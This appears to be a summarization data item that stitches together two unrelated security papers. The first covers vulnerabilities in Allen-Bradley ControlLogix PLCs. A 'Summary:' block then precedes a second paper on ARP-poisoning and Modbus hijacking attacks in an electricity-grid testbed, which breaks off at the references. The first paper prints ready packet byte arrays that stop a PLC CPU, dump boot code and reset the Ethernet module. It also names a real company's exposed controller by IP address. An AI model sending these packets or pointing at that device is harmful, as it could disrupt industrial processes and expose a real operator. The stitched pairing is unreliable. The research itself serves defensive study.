978-1-4673-2984-2/12/$31.00 2012 IEEE 1536Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:00 UTC from IEEE Xplore. Restrictions apply. II. CASE STUDY The Allen Bradley Logix family is the most full featured programmable controllers in the line of Rockwell Automation. The ControlLogix is the flagship product of the Logix family. The ControlLogix consists of a chassis with controller, power supply and I/O modules that can be used as both a controller and a gateway. The number and type of modules is determined based on the size and type of system being controlled, network topologies and protocols, and redundancy requirements. ControlLogix configurations can vary greatly with the large number of modules and ability to mix and match to meet requirements. The 1756-ENBT and 1756-EWEB (which includes a web server) modules provide an Ethernet connection to the ControlLogix and warrant special attention from an information security perspective. A wide range of control system protocols are supported on this. For communication from a server, HMI or other controllers, the ControlLogix supports EtherNet/IP, ControlNet and Data Highway as well as other standard protocols from third party modules such as Modbus TCP. Protocol support for I/O communication includes the EtherNet/IP, ControlNet and DeviceNet plus HART, Foundation Fieldbus and other standard protocols. Since this is a popular controller platform, there is a good chance that most control system protocols are supported directly by Rockwell Automation or by a third party product that can be integrated in the ControlLogix platform. As more capabilities are pushed out to the device like the ControlLogix, they become a more crucial component in a control system and a bigger target. One of the simplest means to secure a ControlLogix is to physically place the controller modules into Run mode and remove the physical key. Unfortunately this prevents remote management and viewing of the configuration. A. Available services 1756-ENBT/A brings Ethernet connectivity to the controller, thus opening up the door to a whole range of remote attack vectors. For example, via nmap : snmp-netstat: TCP 0.0.0.0:80 0.0.0.0 ; http (GoAhead) TCP 0.0.0.0:111 0.0.0.0 ; rpcbind TCP0.0.0.0:44818 0.0.0.0 ; EtherNet/IP UDP 0.0.0.0:68 *:* ; dhcp (if enabled) UDP 0.0.0.0:111 *:* ; rpcbind UDP 0.0.0.0:161 *:* ; snmp UDP 0.0.0.0:2222 *:* ; EtherNet/IP UDP 0.0.0.0:44818 *:* ; EtherNet/IP Port 44818 is used by the Rockwell Automation software (RSLogix, RSLink ) drivers to communicate via Explicit Messages with those ControlLogix controllers which have EtherNet/IP modules enabled. EtherNet/IP is an application layer protocol treating devices on the network as a series of "objects". It is built on the Common Industrial Protocol (CIP), for access to objects from ControlNet and DeviceNet networks. RSLogix, RSLinks and other Rockwell Software can be easily downloaded from Rockwell s support website. By interacting with this software while monitoring the network traffic we can easily analyze and extract the packets needed to monitor and control the PLC i.e. obtain information about the processes running on the CPU or update the firmware. B. Live system With the little help from Shodan search engine [6] it is easy to find ControlLogix devices on the web. The first site we have found was www.scrapmetal.net (American Iron & Metal Co. Inc.). We get there immediately when we enter http://204.101.14.75/index.html in our browser. It is an 1756-ENBT/A web page with completely operational menu on the left side, including the full diagnostics and refreshing rate every 15 seconds. It could be easily seen that the firmware date is Jan 7 2005. This is valuable information for someone who wants to prepare an attack to the device. ControlLogix uses GoAhead web server, which is a simple, portable and compact web server for embedded devices and applications. It is one of the most widely deployed web servers and is embedded in hundreds of thousands of devices. Unfortunately, this web server contains vulnerabilities that ma y allow an attacker to view source files containing sensitive information or bypass authentication [7]. C. Configuration All configuration is done over via EtherNet/IP, for example using RSLogix desktop software. Authentication is optional which means that brute-forcing is possible, because there are no timeouts/lockouts. Moreover, lots of functions don t require authentication so we can perform the attacks as in following examples [8]. D. Forcing CPU to Stop Stops the CPU, leaving it in a Major recoverable fault state. In order to clear the fault the key needs to be turned manually from RUN to PROG twice. // CIP - Unconnected send, via 0x52 command // Service: 0x7 (STOP) // Class: 0x64 unsigned char packetCPUStop[]= "\x00\x00\x00\x00\x02\x00\x02\x00" "\x00\x00\x00\x00\xB2\x00\x1A\x00" "\x52\x02\x20\x06\x24\x01\x03\xF0" "\x0C\x00\x07\x02\x20\x64\x24\x01" "\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00" "\x01\x00"; E. Dump 1756- ENBT module boot code An undocumented service that allows remotely dumping of the EtherNet/IP module s boot code // CIP - Unconnected send // Service: 0x97 // Class: 0xC0 unsigned char packetDump[]= "\x00\x00\x00\x00\x00\x04\x02\x00" "\x00\x00\x00\x00\xB2\x00\x08\x00" "\x97\x02\x20\xC0\x24\x00\x00\x00"; 1537Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:00 UTC from IEEE Xplore. Restrictions apply. F. Reset 1756-ENBT module Resets the EtherNet/IP module. // CIP - Unconnected send // Service: 0x5 (RESET) // Class: 0x01 (Identity Manager) unsigned char packetResetEth[]= "\x00\x00\x00\x00\x00\x04\x02\x00" "\x00\x00\x00\x00\xB2\x00\x08\x00" "\x05\x03\x20\x01\x24\x01\x30\x03"; III. OTHER PLC DEVICES Project Basecamp researchers tested vulnerabilities of selected PLCs from major vendors, and results were presented at the S4 2012 meeting [9]. Each PLC was tested against the following: Upload custom firmware Upload and download ladder logic Backdoors Basic fuzz testing (providing invalid, unexpected, or random data as input) Web server vulnerabilities Spoof authentication/replay configuration Resource exhaustion attack Undocumented functionality/protocols Tested devices were: Allen-Bradley ControlLogix (AB), Schneider Modicon Quantum (Mod), General Electric DE20ME (GE), Schweitzer SEL-2035 (SEL), and Koyo Direct Logic H4-ES (Koyo). Summary of test results is given in Table 2. An x indicates the vulnerability is present in the system and is easily exploited; an exclamation point ( ! ) indicates the vulnerability exists but is difficult to exploit; the checkmark ( 9 ) indicates the system lacks this vulnerability. TABLE 2: THE VULNERABILITY TYPES FOUND IN PLC S AB Mod GE SEL Koyo Firmware ! x ! ! ! Ladder logic ! ! x ! x Backdoors ! x x 9 9 Fuzzing x x x ! ! Web ! x N/A N/A x Configuration ! ! x ! ! Exhaustion 9 9 x 9 9 Undocumented ! x x ! ! Add to this a PLC made by Siemens, described widely in literature, that was targeted by the Stuxnet worm [7], a sophisticated piece of malware discovered last year that was designed to sabotage Iran s uranium enrichment program. It can be concluded that all products are susceptible to internal and external attacks, and that these attacks do not require any significant level of expertise on the part of the attacker. The key point behind attacking PLC is not always how to circumvent its security but monitoring how the legitimate software performs valid operations in order to mimic them, in addition to the usual dose of reverse engineering and fuzzing to discover the secrets behind the scenes. Today malware has become increasingly sophisticated, targeting specific applications on the infected host, so it is not inconceivable for a piece of malware to alter or delete an Human-Machine Interface (HMI), control application, Open Process Control (OPC) server, or data historian. Many people are focused on the Windows zero-days, but they were simply a delivery vehicle [10]. More dangerous payloads affect the controller by changing the controller logic. Therefore, security for control systems should not be approached in the context of IT. Consequently, the security requirements are not based on what it takes to secure a control system against control system threats, but for IT systems (Windows servers and PCs) used in control system applications against IT threats. Industrial Control System (ICS) devices, which have proven safe and reliable for years, have been accused of failures in security. The devices are really good, well-designed, reliable, and safe systems. They were never meant to be security systems, but now they are being accused of not doing what they were not designed to do. As the matter of fact, the most significant difference between the industrial systems and corporate IT domains is the high availability requirement for monitoring and control functionalities (Fig. 1). Fig. 1. Security goals are differently prioritized for general IT and ICS IV. THE SOLUTION With the competitive pressure that most companies face to improve productivity and access to the data in their plants, it is unlikely that engineers will be able to significantly reduce the number of internal and external pathways into their facilities. Furthermore, the use of modern IT technologies now requires a steady stream of electronic data onto the plant floor as well. These often take the form of upgrades, patches, process recipes and remote support connections, all of which pose a security risk. Aggressive patching strategies do help reduce the risk of exposed operating system vulnerabilities, but most plant operators are dependent on their industrial control systems equipment vendors to secure the actual controllers and software products. Unfortunately, this has met with limited success. As of December 2011, the US ICS-CERT had published 137 advisories on control system products with known security vulnerabilities. The good news is that engineers can address these issues by using the strategies outlined in the ANSI/ISA-99 Standards: Security for Industrial Automation and Control Systems [11]. ANSI/ISA-99 standards introduce the concepts of zones and conduits as a way to segment and isolate the various subsystems in a control system. A zone is defined as a grouping of logical or physical assets that share common 1538Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:00 UTC from IEEE Xplore. Restrictions apply. security requirements based on factors such as criticality and consequence. Equipment in a zone has a security level capability. If that level is not equal to or higher than the required level, extra security measures must be taken. Any communications between zones must be via a defined conduit. Conduits control access to zones, resist Denial of Service attacks or the transfer of malware, shield other network systems and protect the integrity and confidentiality of network traffic. Typically, the controls on a conduit are intended to mitigate the difference between a zone s security level capability and its security requirements. Focusing on conduit mitigations is typically far more cost effective than having to upgrade every device or computer in a zone to meet a requirement. It is important to understand that ANSI/ISA99 standards do not specify exactly how a company should define its zones or conduits. Instead, the standard provides requirements based on a company s assessment of its risk from an attack. Since risk is a function of not only the possibility of an incident, but also the consequences of such an incident, the zones and conduits and the protection needed for each will vary for each facility. Table 2 lists some of the sub-sections in the document that address network segmentation using zones and conduits for Industrial Automation and Control Systems (IACS). TABLE 2: KEY ZONE AND CONDUIT REQUIREMENTS FROM ANSI/ISA-99.02.01 FOR IACS Description Requirement Develop the network segmentation architecture A network segmentation countermeasure strategy employing security zones shall be developed for IACS devices based upon the risk level of the IACS. Employ isolation or segmentation on high- risk IACS Any high-risk IACS zone shall be either isolated from or employ a barrier device to separate it from other zones with different security policies, levels or risks. The barrier device shall be selected commensurate to the risk reduction required Block non-essential communications with barrier devices Barrier devices shall block all non- essential communications in and out of the security zone containing critical control equipment. Once the conduits and their security requirements are defined, the final phase is to implement the appropriate security technologies. There are two popular options for this stage: Firewalls : These devices control and monitor traffic to and from a zone. They compare the traffic passing through to a predefined security policy, discarding messages that do not meet the policy s requirements. Typically they will be configured to pass only the minimum traffic that is required for correct system operation, blocking all other unnecessary traffic. They can also filter out high risk traffic, such as programming commands or malformed messages that might be used by hackers to exploit a security hole in a product. Industrial firewalls are designed to be very engineer-friendly and are capable of detailed inspection of protocols such as DNP-3, EtherNet/IP and Modbus/TCP. VPNs (Virtual Private Networks): These are networks that are layered onto a more general network using encryption technology to ensure private transmission of data and commands. VPN sessions tunnel across a transport network in an encapsulated format, making them invisible to devices that don t have the have access to the VPN members secret keys or certificates. The whole zone and conduit approach implements a strategy of defence in depth multiple layers of defence distributed throughout the control network which has been proven in the IT community to be a strategy that works well. As a contrast, we have so-called air gap , which does not work at all, however it lulls us into false sense of security. V. CONCLUSION Until recently, few people knew about PLC vulnerabilities and attack tools. This all changed when Stuxnet came out now every hacker in the world knows about PLCs, HMIs and the opportunities to attack them. Worst still, it showed the world that finding a zero-day vulnerability isn t even required to attack most PLCs you just need to get a foothold in a computer that communicates to a PLC. It is time to start protecting the industrial controllers. There is no silver bullet, but it is believed that shielding them with firewalls and VPNs from all other equipment on the network, including the HMIs, is an important start. A CKNOWLEDGEMENT Results presented in this paper are part of the research supported by Ministry of Education and Science of the Republic of Serbia, Grants No. III-45003 and TR-35026. R EFERENCES [1] J. Russell and R. Cohn, OS-9 , Bookvika Publishing (Wikipedia articles), 2012. [2] US-CERT Vulnerability Note #362332: Wind River Systems VxWorks debug service enabled by default, 23 July 2012. [3] US-CERT Vulnerability Note #840249: Wind River Systems VxWorks weak default hashing algorithm in standard authentication API (loginLib), 10 May 2012. [4] ICS-ALERT-11-346-01 Schneider Electric Quantum Ethernet Module Multiple Vulnerabilites, December 12, 2011. [5] ICS-ALERT-12-020-03 Schneider Electric Modicon Quantum Multiple Vulnerabilities, January 20, 2012. [6] ICS-ALERT-10-301-01 Control system Internet accessibility, October 28, 2010. [7] US-CERT Vulnerability Note #975041: GoAhead Web Server discloses source code of ASP files via crafted URL, 11 Jan 2010. [8] R. Santamarta, Attacking Controllogix , Digital Bond Project Basecamp, 2012. Available: http://www.reversemode.com/ [9] R. Wightman, Project Basecamp at Digital Bond s SCADA Security Scientific Symposium S4, Miami Beach, USA, January 18 19, 2012. [10] R. Langner, Robust Control System Networks , New York, NY: Momentum Press, 2011. [11] ANSI/ISA 99.00.01 2007: Security for Industrial Automation and Control Systems, Part 1: Terminology, Concepts, and Models, ISBN: 978-1-934394-37-3. 1539Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:00 UTC from IEEE Xplore. Restrictions apply.
Summary:
In this paper we have shown that PLC devices are complex embedded systems often relying on some operating system. They are plagued by the same sorts of vulnerabilities and exploits as general purpose operating systems. In fact, the number of latent vulnerabilities in the typical microprocessor-based device can be surprisingly high. However we don t need bugs or vulnerabilities in order to attack the PLC. We can exploit its normal operation provided we have some access to the device. It is suggested that the one of effective ways to avoid expensive business losses or production disruption due to misuse of the PLC is to start protecting the system with defence-in-depth measures.
|
Summarize:
Keywords Industrial Control Systems, SCADA, Security I. INTRODUCTION Supervisory Control and Data Acquisition (SCADA) systems are used to manage and automate processes in critical infrastructures such as electricity grids or water distribution facilities. According to the ISA definition [1], SCADA-based Industrial and Automation Control Systems (IACS) are structured into five distinct levels: level 0, reserved for the sensors and actuators; level 1, that contains devices such as Programmable Logic Controllers (PLC s) and Remote Terminal Units (RTU s); level 2, composed of supervisory control equipment's such as the Human-Machine Interface (HMI); level 3: for the Manufacturing Execution Systems (MES), such as the systems hosting production planning software; and level 4 for the remaining business related systems. The interconnection of level 0 and level 1 devices (e.g. PLC s and RTU s) and the interconnection of level 1 devices with level 2 devices (e.g. HMI s) are probably the most vulnerable points of IACS infrastructures. They were traditionally isolated and based on proprietary protocols and technologies without in trinsic security capabilities, relying on obscurity and air-gapping principles for such purpose. Nevertheless, with the progressive adoption of Ethernet- and TCP/IP-based networks, standardized SCADA protocols and VPN-based remote access (t o reduce maintenance costs), these networks are more connected than ever to the remaining infrastructure the corporate ne twork and even the Internet either by sharing physical network and computing resources or via (not foolproof) interconnection firewalls, routers or gateways. This paradigm change drastically increases the risks, due to the increased system complexity, the introduction of new attack vectors and the amplified exposure of existing security vulnerabilities. SCADA systems are intrinsically different from traditional ICT systems [2]. Automated real time physical processes do not need high throughput but demand continuous availability with guaranteed low delay and low jitter. More, their primary focus is on availability and service continuity opposed to classic ICT systems, where information confidentiality and integrity come first [3]. SCADA systems also have much longer lifetime cycles, due to their high upgrade costs easily reaching obsolescence by ICT standards. Even simple security patches take much longer to deploy, due to the need for previous testing and certification Recognizing those specificities and risks, as well as the tremendous impact they can ha ve on SCADA-based critical infrastructures such as energy gr ids, water distribution systems, transportation systems or factory plants, there is currently a strong investment on research towards enhancing the security of (both legacy and more recent) SCADA systems. There is an extensive literature researching various approaches for introducing IACS-specific intrusion detection mechanisms, as well as for improving the intrinsic security of SCADA systems. However, due to logistic constraints and the difficulty of using real-world production systems for research purposes, not many works are based on wider testbed scenarios reproducing real infrastructures, instead using very simplified test benches or general-purpose datasets. Among these, the large majority is focused on the defensive perspective of the targeted infrastructure, instead of th e attacker s point of view. While this is understandable considering how difficult it is to build larger, more realistic testbeds and the fact that researchers aim is to improve the SCADA systems cyber- security awareness and capabilities we believe it is also important to grasp the attacker s perspective, including the challenges he faces to implement a successful attack. In this paper, we provide a practical description of somehow representative cybe r-attacks (network based enumeration, communication hijacking and service disruption) targeting SCADA systems within a testbed that represents an 978-3-901882-89-0 @2017 IFIP 741 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. electricity grid (regional network of medium and high voltage distribution). This testbed consists of a hybrid environment that includes real networking and SCADA assets (e.g. PLCs, HMIs, process control servers) controlling an emulated power grid (so we can assess the possible impact of these attacks on the physical world). We explain those attacks and discuss some of the challenges faced by an a ttacker to implement them. This work was performed in the scope of the CockpitCI [4] and ATENA [5] research projects, which aim at providing a holistic approach to security, safety and resilience of energy distribution grids, including the detection and prevention of cyber-attacks and the analysis of the mutual interdependency between their ICT assets (communications network, servers, SCADA control applications, PLC s and RTU s) and the energy side (e.g. transmission lines, substations, power transformers and generators, quality of energy service). Detection of cyber-attacks and situational awareness is a key part of these projects, and as such we built a specialized detection layer that has been extensively described and evaluated in previous works (e.g. [6-7]). This paper complements them by focusing not so much on the detection and mitigation solutions, but rather on the process of preparing and executing the attacks used for validation purposes. For sake of readability and represen tativeness, we decided to focus on simple, classic attacks, inst ead of more complex actions. The rest of the paper is organized as follows. Next section, we discuss related work. Section III introduces the testbed environment we used. The im plemented cyber-attacks are discussed in Section IV, and Section V concludes the paper. II. R ELATED WORK As already mentioned, existing research literature discusses different types of cyber-attack s against SCADA systems, such as Denial of Service (DoS) attacks [8-10], Man-in-the-Middle (MitM) attacks [11-12] or malware-based attacks [13]. Nevertheless, those discussions are usually focused on the defense mechanisms (and not on the attacks), based on small and/or simulated scenarios or lack detail on the practical implementation of the attack. Post-incident research on real -world attacks are valuable sources. Rolf Langer s report on the well-known Stuxnet malware [14] targeting Iran Nu clear facilities is a good example of such sources. Other high-profile well covered include the Duqu malware [15] or the 2015 Black Energy attack allegedly responsible for power outages in the Ukrainian Power Grid [16]. These sources have the advantage of being based on real, successful attacks but are usua lly limited to the analysis of complex high-profile incidents often supported by nation-state resources instead of simpler but representative attack profiles. III. T ARGET ENVIRONMENT A. HEDVa Testbed With the purpose of supporting the demonstration and validation of the CockpitCI framework, a testbed reproducing a regional-scale energy distribution network was built by Israel Electric Corporation (IEC). From ICT and SCADA perspectives this testbed is composed of real assets, including IT network, control and field level components, servers and services that typically integrate such a system. Within this scenario, an electrical distribution grid topology was entirely emulated using specialized soft ware developed at IEC, given the practical impossibility of us ing a real, large-scale energy distribution infrastructure (composed of many substations and hundreds of kilometers of power lines). This approach results in a hybrid testbed, where all ICT and SCADA components are real and believe to be monitoring and controlling a real energy grid. This is achieved by using an agent-based grid simulation model that uses real PLC equipment to emulate elements such as feeders or circuit breakers. The interface between th e real and emulated domains of the grid scenario includes all the monitoring data and controls that would exist in a real operational environment. Figure 1 provides an overview of this testbed (designated as HEDVa: Hybrid Environment for Design and Validation), of which only a subset will be relevant to the scope of this paper. By using such an environment, it became possible to research more complex interdependencies between different components (e.g. network, SCADA devices) and different domains (e.g. impact of ICT faults on the quality of energy on the different points of the grid). Furthermore, having a real deployment of ICT and SCADA systems allowed more realistic assessments and the collection of more extensive and realistic validation data. Figure 1: Overview of the HEDVa Testbed [6] B. The Modbus Protocol Among the wide range of different SCADA protocols available, the HEDVa Testbed uses Modbus over TCP/IP [17- 18]. Modbus is a protocol used to query field data using a polling client/server approach. Communication is based on query/response transactions identified by a transaction ID field and distinguished by a function code field. According to the Modbus data model, different types of tables are mapped into the PLC memory (such as discrete inputs, coils or holding registers). These values are queried via their respective function code and memory address (see Figure 2). There is no built-in mechanism (or fields) for authentication, authorization or encryption. Hence, without proper security enforcement in the remaining network stack, it 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 742 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. becomes possible to dissect the Modbus messages payload (i.e. critical information from a physical process). Figure 2: Example of the interaction between two Modbus devices Forging communication or field data is also possible by simply crafting a valid value fo r the transaction ID field (see Figure 3), as this value is frequently predictable (due to lack of randomness in poor Modbus implementations) or even blindly discarded by some Modbus implementations. Moreover, Modbus/TCP runs on the top of non-encrypted TCP sessions. Figure 3: Modbus Frame and header format Even considering the real-time nature of the underlying processes, the polling based mechanism provided by the Modbus protocol is not effec tively real-time. The intervals between each request directly impact the delay time between a change in the physical process and the time the change is observed by the HMI operator. This results in a small but viable time window for hijacking communications before the Operator and/or the HMI appl ication notice any changes. Despite all these security vulnerabilities of Modbus apparently making the attacker s work too easy, Modbus holds a significant market share (over 20%, considering all its variations [19]) and many of the other protocols are not much different. This means the testbed represents of a large subset of the systems currently in operation. Several open source components can be used to build Modbus hacking tools, such as the Nmap s modbus-discover script [20] or Modscan [21] that allows to map and enumerate PLCs using Modbus over TCP within a network by exploring their replies. Another example is a python library extended from Scapy (a widely-used p acket manipulation framework easy to extend and integrate with other applications) that contains Modbus specific functions to easily craft Modbus frames [22]. Next section will discuss with the execution of a series of attacks, which also served fo r validating the proposed DIDS. IV. ATTACK STAGING AND EXECUTION All the attack scenarios assumed the attacker had access to the process control network (e.g. as result of a compromised host this step, which corresponds to the exploitation of the initial attack was intentionally omitted). For practical demonstrations, a dedicated host was deployed on the HEDVa, to serve as a base for the attacker, which could be easily relocated on the infrastructure, since it was hosted on a virtual machine. A similar attack strategy could be implemented (with the proper adjustments) to tr igger an attack (for instance, forging or sending Modbus packets) directly from a compromised HMI or other component. A three-stage attack strategy was devised, pursuing the following goals: monitoring the process values (to gain knowledge about the nature and characteristics of the controlled process), change them without being noticed in the SCADA HMI consoles and finally, induce service disruption on the energy grid. These should cover a large subset of a cyber-attack targeting a SCADA system. A by no means exhaustive list of the implemen ted attacks includes classical and Modbus specific scans, different variants of Denial of service attacks based on network floods, and a SCADA specific MitM specifically cu stomized for this process environment. Next, we describe some of those attacks. A. The HEDVa use case scenario for attack implementation For the sake of readability, we ll describe the attacks using a subset of the HEDVa testbed, configured to emulate an electricity distribution grid composed by two energy feeders and several circuit breakers, controlled by real Modbus PLCs (see Figure 4). Several HEDVa assets, including services, equipment (such as network switches and PLCs), servers (both physical and virtualized) and networks are also part of this use case. The PLCs and the remaining elements of the SCADA infrastructure in charge of th e emulated grid are connected using an Ethernet LAN infrastructure (using VLAN segmentation for domain separation). Figure 4: Representation of the electrical grid use case scenario The scenario deployed on the HEDVa (see Figure 5) includes two Human Machin e Interface (HMI) hosts, controlling and supervising the PLCs, an OPC server, a dedicated database for past even ts and offline analysis, and a deployment of the CockpitCI DIDS (not depicted). However, the DIDS security detection components didn t play any active role they were used to observe and document the attacks, without interfering with the attacker s actions. This scenario not only offered the means to validate the CockpitCI DIDS, but it also offered the opportunity to implement and analyze a series of security strategies. For the TCP Header MBAP Header Function Code IP Header DataTransactionID ProtocolID UnitID Length Modbus PL Cs T wo en er g y f eed er sCircuit break ersAll me asure Vo ltage and curre nt 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 743 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. latter purpose, and complementar y to the classic penetration testing and auditing procedures, a series of team drills were executed to obtain relevant data on the most effective tactical defensive and offensive strategies. Switch HMI2 SCADA / OPC Server HMI1 Switch Security Gateway / Router Switch NIDS Attacker Switch Figure 5: Reference scenario for the use cases Besides these efforts, the acquisition of relevant datasets for development, training and offline evaluation of anomaly detection methods was also another important role of the HEDVa scenario. For capturing all the network interactions for further analysis, a centralized network point of capture was configured. This was achieved using port monitoring / mirroring in the switch layer, as opposed to a distributed packet acquisition solution to avoid all the issues with duplicated packets or timestamp synchronization. B. Network Reconnaissance Network scouting is one of the first steps of an attack, meant to gather information about all the components of the target environment, to discover and identify topologies, hosts and services. For instance, traditional network components such as HMIs are identified by IP and MAC addresses, operating system versions and a set of services (using techniques such as FIN scans, see Figure 6) in such cases, the specific service footprint, together with TCP fingerprinting data is useful to identify specific components or software implementations. Figure 6: First step of a Network/Modbus scan In addition to that, each PL C is also identified and addressed by the unitID field, part of the Modbus frame (see Figure 7). For simple scenar ios where one IP address correspond to one PLC, the unitID can be set to a fixed known value (typically 1 ) or may be ignored by the Modbus implementation. Nevertheless, a Modbus gateway, using only one IP address, may hide several PLCs with different unitIDs. As part of an attack, a Modbus request with a wrong unitID, blindly used by an attacker, may be discarded or easily flagged with proper security mechanisms. Thus, and for Modbus over TCP, it is critical to perform a Modbus enumeration on top of the traditional TCP/IP scans. Both types of scans are relevant as they can be used not only to discover devices and types of services but also to perform fingerprinting and discover PLCs behind gateways. Figure 7: Modbus Device Scan / Enumeration Network scouting provides a perspective on the target infrastructure from the network point-of-view, corresponding to the layers 2-4 of the OSI model. Despite its usefulness as a tool to identify and enumerate devices and services it doesn t provide process-level information, which is required to implement sophisticated attacks. The next subsection will present the technique that was us ed to obtain such information. C. Using ARP poisoning to implement a MitM attack The concept of a ARP poisoning MitM attack usually comprises two parts: an ARP spoofing and a communication hijacking step. In the first stag e, the idea is to spoof the ARP cache of both target devices, belonging to the same link, by sending malicious and unsolicited ARP is-at messages to the network (see Figure 8) to force both devices to send the packets through the attacker MAC address. This requires th e attacker to know at least the IP and MAC addresses of the victims and the link they are connected to. As soon as the ARP cache of each victim is spoofed, the traffic gets redirected through the attacker. Figure 8: ARP poisoning attack In the second attack stage (see Figure 9), when the traffic is already being redirected, the attacker can choose to read the messages and forward them, or actively change them. Depending on the type of TCP connection, its payload and the actual data the attacker is interested in, the process may get Control System Network22 HMI1 Attacker Attacker PLC SwitchFIN 11FINPort StatePort State Do it slo w lyAnd fo r all the ne two rkS tage 1: Ho sts and se rvice s Control System Network1 12 2 (spoofed) ARP Cache Table: ip_plc mac_atacker(spoofed) ARP Cache Table: ip_hmi mac_atacker HMI1 Attacker Attacker PLC SwitchARP Spoofed ReplyARP Spoofed ReplySt a g e 1 : ARP p o iso ning 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 744 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. complex. For persistent TCP connections, as opposed to one TCP connection per data request (Modbus can be implemented using the two communication models), the attacker will need to keep the TCP fields consistent (e.g. sequence and acknowledgement numbers) and the connection open (e.g. TCP keep-alive packets). Figure 9: TCP hijacking Moreover, in the case of Modbus, the requested values typically change in real-time and some of them are directly changed by the SCADA operator (e.g. Modbus writes), this means the attacker n eeds to somehow keep track not only of all the interactions but also comput e and reproduce the effects in the physical process (e.g close of a circuit breaker in electric path may change the physical values such as current and voltage in other parts of the circuit). The complexity of this increases as the number of elements, relations and interdependencies increases. D. Attack strategy and execution The objective of the attacker can be su mmarized as such: hijack the entire grid in such a way that the main HMI (HMI1) has no clue about the ongoing attack. Moreover, the attack goal should be accomplished by the a ttacker while going unnoticed. One of the first challenges faced by the attacker has to do with understanding the network topology and communication flows. For instance, the HMI1 host (one of the victims) is not part of the same network link as the PLCs, requiring the attacker to implement an ARP spoof targeting the gateway interface of the network link where the attacker is placed instead of the HMI1 (see Figure 10). Figure 10: ARP poisoning for the implemented attack Besides HMI1, there is a second HMI (HMI2) developed to observe and validate the attack, which was not spoofed. HMI1 uses TCP persistent connections to control several PLCs (11, to be more precise). Thus, the a ttacker needs to know how to handle or forward any spoofed packets in real-time, while avoiding TCP connection drops, to prevent any suspicious behaviour on the HMI console that could unveil his presence (see Figure 11). Packet drops auto matically raise an alarm and change the view of the HMI for the corresponding PLC after a couple of seconds, indicating a potential issue. A TCP connection lost or a lack of a Modbus reply from the PLC is also visible from the HMI console. The second HMI did not use persistent connections. Later, during the trials, it was discovered that each PLC only supported a maximum of two simultaneous TCP connections. This may limit the way TCP connections are handled and re directed by the attacker. Figure 11: TCP hijacking for the implemented attack At first, the main concern was to place the attacker in the middle of the communication between the HMI1 and the PLCs to capture and analyze relevant process information. This allowed the attacker to gather more detailed information about the communications and the controlled process, learning how each Modbus register value affected the others (e.g. circuit breakers, current and voltage ranges). Once the attacker was able to figure out the basic behavior of the controlled process, it was time to step up the challenge and hijack the entire process. This required forging the entire grid state in such a way that any HMI interaction may produce a realistic state update, while decoupling HMI-PLC interactions. For this purpose, the attacker needs to reply to the Modbus requests in real-time. Moreover, TCP session hijacking requires the attacker to maintain the integrity of the TCP connection (such as TCP sequence numbers) to avoid a connection drop. Then, the following task is cr afting the Modbus frames and recreate a fake view of the entir e scenario in real-time. This task was implemented using a in-house application on the top of Scapy framework [22] since common open-source tools normally used for this sort of attacks are not SCADA/Modbus aware and did not fulfill the project needs, either by not offering an integrated solution for all the steps or by lacking flexibility to adjust settings to the HEDVa scenario. After the ARP spoofing, the attacker first starts by capturing the current state of th e grid. This is achieved by dumping and decoding one complete interaction cycle (i.e. the set of Modbus request-reply transactions) between the HMI1 and all PLCs. This represents the initial state of the simulated view and it allows to restore the previously grid state after stopping the attack (in case the attacker wants to do so). The attacker is also responsible to perform deep inspection of each packet and selectively intercept all the TCP connections from 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 745 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. the HMI1 to the PLCs while forwarding the others (i.e. the communications between HMIs and PLCs). When requests from the HMI1 are received, the attacker will compute the responses based on its own replica of the model (obtained during the process analysis stage). This effectively decouples the HMI1 from the PLCs, creating two distinct communication flows: one between the HMI1 and the attacker and the other one betw een the attacker and each PLC. This allows not only to hijack the data exchanged between them but also trigger any kind of service disruption against the PLCs compromising the physical process behind them. Since the true state of the PLCs is hidden from HMI1, the attacker is free to do whatever he wants without the knowledge of the legit SCADA operator. Moreover, all the changes performed by the SCADA operator such as opening or closing a breaker are properly intercepted and handled by the attacker. Finally, whenever the attacker decides to stop the attack, he only needs to perform the inverse of the first steps, dumping the values of the simulated HMI1 view to the PLCs, so that there is no difference between the HMI1 and PLC states, also restoring the ARP caches by sending additional unsolicited ARP replies with the correct a ssociations between MAC and IP addresses. V. C ONCLUSIONS AND FUTURE WORK The attack procedures here described illustrate a complete intrusion procedure applied to a specific IACS use case. The reconnaissance step is like other types of network scans, the main difference is the Modbus unitID field, depending on the components and how they are deployed. The service disruption is also straight-forward since as soon as the attacker has access to the network, it is simple to redirect Modbus traffic (causing the disruption) or even flood the PLCs, as they typically have moderate / small amount of resources available. The communication hijacki ng attack that was implemented has proven to be considerably more complex and tightly coupled to the field processes in the SCADA environment than, for instance, a HTTP hijacking attempt. This is due to several reasons, such as the need to re produce part the physical process behavior without getting detected. Despite new infection paths, types of attacks or strategies to get unnoticed, further efforts and research should focus on improving the process of recreate and maintain the fake views used by the attacker during the communication hijacking and for specific known domains like energy grids. This work is part of a wide r effort where multiple cyber detection technologies are being researched to understand how these types of cyber security events could be adequately handled. Moreover, this effort also intends to alleviate the lack of open available datasets (such as raw traces from SCADA IACS) allowing to further expl ore and research new security approaches and detection mechanisms. A CKNOWLEDGMENT This work was partially funded by the CockpitCI European Project (FP7-SEC-2011-1 Project 285647) and by the ATENA European Project (H2020-DS-2015-1 Project 700581). R EFERENCES [1] ISA, 